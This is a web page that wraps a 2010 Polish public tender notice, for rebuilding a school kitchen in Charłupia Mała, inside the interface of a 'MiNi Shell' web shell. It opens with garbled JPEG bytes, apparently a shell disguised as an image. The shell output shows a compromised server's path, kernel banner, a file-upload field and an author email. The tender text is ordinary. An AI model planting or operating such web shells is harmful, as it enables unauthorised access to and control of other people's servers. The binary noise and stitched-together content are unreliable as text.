JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100819/257168-N-2010.html

<p class="kh_header"><b>Sieradz: Rozbudowa zaplecza kuchennego i przebudowa części istniejącej bloku żywieniowego przy Szkole Podstawowej w Charłupi Małej</b><br>
<b>Numer ogłoszenia: 257168 - 2010; data zamieszczenia: 19.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sieradz , ul. Armii Krajowej 5, 98-200 Sieradz, woj. łódzkie, tel. 043 827 55 50, faks 043 822 32 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugsieradz.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa zaplecza kuchennego i przebudowa części istniejącej bloku żywieniowego przy Szkole Podstawowej w Charłupi Małej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)Przedmiotem inwestycji jest rozbudowa zaplecza kuchennego istniejącego bloku żywieniowego oraz przebudowa części istniejących pomieszczeń, polegająca na wykonaniu robót budowlanych, na które nie jest wymagane uzyskanie pozwolenia na budowę (wykucie i zamurowanie otworów okiennych i drzwiowych) w Szkole Podstawowej w Charłupi Małej.
W ramach dostosowania obiektu do aktualnie obowiązujących przepisów związanych z działalnością kuchni planuje się wykonanie drobnej przebudowy pomieszczeń wewnątrz budynku, w sposób nie naruszający w znacznym stopniu elementów konstrukcji budynku oraz dobudowę dodatkowych pomieszczeń (zaplecza socjalnego i magazynowego).
Zaprojektowano kompleksową zmianę układu funkcjonalnego pomieszczeń w budynku, co umożliwi realizację prawidłowego ciągu technologicznego w części kuchennej obiektu. Poza robotami murowymi, zaplanowano również wymianę stolarki okiennej i drzwiowej w części budynku obejmującej blok żywienia oraz wyprawę ścian i posadzek, jak również wymianę wyposażenia kuchni.
Planuje się zastosowanie stolarki okiennej PCV 5-komorowe z rozszczelnieniem, z zastosowaniem szyb niskoemisyjnych, co pozwala uzyskać k = 1,1 W-m2K. Okna powinny mieć konstrukcję umożliwiającą wietrzenie pomieszczeń. W oknach pomieszczeń kuchennych zamontować należy siatki ochronne przeciw owadom. Stolarka drzwiowa typowa, wewnętrzne - płycinowe i aluminium (z okienkiem podawczym), drzwi zewnętrzne - aluminiowe, z ciepłego aluminium w kolorze brązowym ze szkłem bezpiecznym.
Posadzki: We wszystkich pomieszczeń powinny być gładkie, nieścieralne, nienasiąkliwe i nie powodujące poślizgu oraz łatwe do utrzymania w czystości. W pomieszczeniach części kuchennej stosować terakotę groszkową lub ryflowaną. Należy pamiętać, że w pomieszczeniach gdzie występują kratki ściekowe posadzki były wykonane z odpowiednim spadkiem w ich kierunku. Styki ścian i podłóg należy wyoblić. Posadzki zaplanowano z płytek gres we wszystkich pomieszczeniach części stołówkowo-kuchennej. Płytka podłogowa 30x30 cm z cokołem 8,3 cm. W sanitariatach terakota. Podkłady cementowe posadzek pod gres dylatować w polach 3,0x3,0 m.
Ściany i sufity: Wszystkie pomieszczenia powinny mieć gładką, łatwo zmywalną i odporną na działanie wilgoci powierzchnię. Glazura do wysokości 2,6 m w kuchni, zmywalni, przygotowalni i węzłach sanitarnych. Lamperia olejne do wysokości 2,0 m w magazynach żywności. Ściany korytarza malowane do wysokości 1,60 farbą olejną, powyżej farbą emulsyjną. Sufity malowane farbą emulsyjną. Narożniki ścian w korytarzach głównych zabezpieczyć przed uszkodzeniami mechanicznymi. Otwory w ścianach budynku, np. przejście przewodów wod-kan. zabezpieczyć siatkami metalowymi przed przedostaniem się gryzoni.
W pozostałych pomieszczeniach w miejscach zlokalizowania umywalek bądź zlewozmywaków - fartuchy z glazury ( min. 160 cm + po 60 cm na boki).
Malowanie w jasnych kolorach; sufity i ściany powyżej okładzin emulsja akrylowa. Do ścian zastosować farby kolorowe (z 2-ej gamy kolorów), szczegółowy dobór kolorystyki do uzgodnienia z inwestorem na etapie realizacji. Planuje się kolory z gamy kolorów żółci i zieleni (piaskowy, groszkowy).
Parapety: wewnętrzne - w nowo wydzielanych pomieszczeniach wykonać z płyty MDF w kolorze białym, pozostałe wykorzystać istniejące lastrykowe; w pomieszczeniach ciągu kuchennego parapety okienne wykonać z płytek glazurowanych ze spadkiem; zewnętrzne - z blachy stalowej ocynkowanej powlekanej w kolorze brąz.
Zadaszenie na wejściem do budynku: Wykonać jako przedłużenie, o odpowiednim wysięgu stropodachu budynku (dobudowy).
Instalacje i urządzenia sanitarne: Instalacja wodociągowa - z gminnej sieci wodociągowej. W pomieszczeniach zgodnie z planem należy doprowadzić wodę zdatną do picia, celów sanitarnych i gospodarczych. Przebudowa istniejącej instalacji wodociągowej. Do maszyny do mycia naczyń należy doprowadzić oprócz wody zimnej wodę ciepłą o temp. 50°C. Przyjęty typ maszyny zapewni wodę do wyparzenia o temp. 85-90°C. W projekcie określono umiejscowienie punktów poboru wody, kratek ściekowych oraz urządzeń sanitarnych. Wpusty podłogowe w pomieszczeniach kuchennych o średnicy O100 z ruchomymi rusztami i wyjmowanymi wiaderkami osadnikowymi do zatrzymywania nieczystości stałych. W zlewozmywakach oraz wannie zamontować siatki zatrzymujące nieczystości stałe. Wanna (brodzik) do mycia naczyń kuchennych powinna być zamontowana na podmurówce.
W pomieszczeniu porządkowym zlew zamontować tak, aby górna krawędź znalazła się na wysokości 0,40-0,45m od posadzki.
Kanalizacja sanitarna - istniejąca lokalna do gminnej sieci kanalizacyjnej. W poszczególnych pomieszczeniach zainstalować urządzenia zgodnie z rozplanowaniem na rysunkach. Przebudowa podejść i układu wewnętrznego instalacji kanalizacyjnych.
Instalacje i urządzenia grzewcze: Instalacja istniejąca (bez zmian), do korekty wielkości i rozmieszczenia grzejników w związku ze zmianą i rozbudową o dodatkowe pomieszczenia. Z kotłowni zlokalizowanej pod pomieszczeniami jadalni i kuchni. Istniejąca instalacja oparta o przewody stalowe i grzejniki stalowe (żeliwne), do zachowania.
Instalacje i urządzenia wentylacyjne: We wszystkich pomieszczeniach należy przewidzieć odpowiednią ilość przewodów wentylacji grawitacyjnej. Nad urządzeniami grzewczymi w kuchni przewidzieć okap oraz kratki wyciągowe wentylacji mechanicznej. W WC wentylacja mechaniczna załączana wyłącznikiem światła lub indywidualna załączana lokalnie, spełniająca po wyłączeniu rolę wentylacji grawitacyjnej.
Wentylacja została zaprojektowana zgodnie z normami tj. mechaniczna w pomieszczeniach związanych z ciągiem kuchennym (kuchnia 15-krotna wymiana, zmywalnia, obieralnia i przygotowalnia 8-krotna), oraz grawitacyjna (wentylacja typu z): 50 m3-godz.-oczko w łazience.
W pomieszczeniach W.C. i łazienek oraz innych oznaczonych na rysunkach w dokumentacji w kratkach wentylacyjnych zamontować wentylatory kanałowe, elektryczne sprzężone z włącznikami światła lub załączane lokalnie.
Instalacje i urządzenia elektryczne: Przyłącze energetyczne - istniejące w budynku (bez zmian). Planuje się rozbudowę fragmentu instalacji elektrycznej związanej z blokiem żywienia. Podstawowym oświetleniem jest oświetlenie fluorescencyjne. Oświetlenie żarowe w pomieszczeniach gospodarczych, sanitarnych i technicznych. W kuchni zastosować oprawy oświetleniowe o kloszach pełnych (np. tunelowe). Za okapem kuchennym należy przewidzieć dodatkowe oprawy oświetleniowe. Instalacje elektryczną przewidzieć dla podłączenia wentylatorków osiowych montowanych na kratkach wentylacji grawitacyjnej. Instalację siłową oraz sterującą przewidzieć do podłączenia urządzeń technologicznych.
W budynku wykonać następujące instalacje:
-oświetleniową
-gniazd wtyczkowych ogólnego przeznaczenia
-zasilającą urządzenia technologiczne
Instalacje wykonać przewodami kablowymi YKY pżo w tynku z zastosowaniem osprzętu podtynkowego. W pomieszczeniach sanitarnych stosować osprzęt szczelny JP44 w obudowie izolacyjnej.
2)Szczegółowy opis przedmiotu zamówienia określa projekt budowlany, przedmiar robót i Specyfikacja techniczna wykonania i odbioru robót budowlanych - załączniki nr 10,11 i 12 SIWZ.
3)Wykonawca zobowiązany jest opracować projekt organizacji i harmonogram robót zgodnie z wymogami Specyfikacji technicznej wykonania i odbioru robót budowlanych.
4)Zamawiający informuje, że teren budowy znajduje się w bezpośrednim sąsiedztwie funkcjonującej szkoły podstawowej. Wykonawca prowadząc roboty budowlane musi uwzględnić zagrożenia i przeszkody wynikające z działalności placówki oświatowej i zwrócić szczególną uwagę na zapewnienie bezpieczeństwa dzieci.  
5)Zamawiający zaleca zapoznanie się w terenie z miejscem prowadzenia robót budowlanych. 
6)Wykonawca udzieli gwarancji jakości:
a.na roboty budowlane na okres 60 miesięcy od daty odbioru końcowego, 
b.na urządzenia zgodnie z kartami gwarancyjnymi z zastrzeżeniem, że bieg terminu z kart gwarancyjnych nie rozpocznie się wcześniej niż 14 dni przed terminem odbioru końcowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli Wykonawca w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 3 roboty budowlane polegające na wykonaniu remontów lub rozbudowie lub budowie obiektów i wartości co najmniej 150 000,00 zł każda
Ocena warunków, o których mowa w pkt 5 i 6 SIWZ dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 7 SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w.w warunki Wykonawca spełnił</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca dysponuje osobami posiadającymi: 
a.	uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej i co najmniej 5 letnie (łącznie) doświadczenie w kierowaniu robotami 

b.	uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych i co najmniej 5 letnie (łącznie) doświadczenie w kierowaniu robotami,
c.	uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych i co najmniej 5 letnie (łącznie) doświadczenie w kierowaniu robotami
Ocena warunków, o których mowa w pkt 5 i 6 SIWZ dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 7 SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w.w warunki Wykonawca spełnił</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy -(załącznik nr 3)
2)Oświadczenie o braku podstaw do wykluczenia - załącznik nr 5,
3)Oświadczenie potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - (załącznik nr 6),
4)Oświadczenie potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (załącznik nr 7),</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> eurzad.ugsieradz.com.pl/serwis/przetargi.jsp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sieradz
ul. Armii Krajowej 5
98-200 Sieradz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2010 godzina 09:00, miejsce: Urząd Gminy Sieradz
ul. Armii Krajowej 5
98-200 Sieradz
Punkt Obsługi Interesantów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com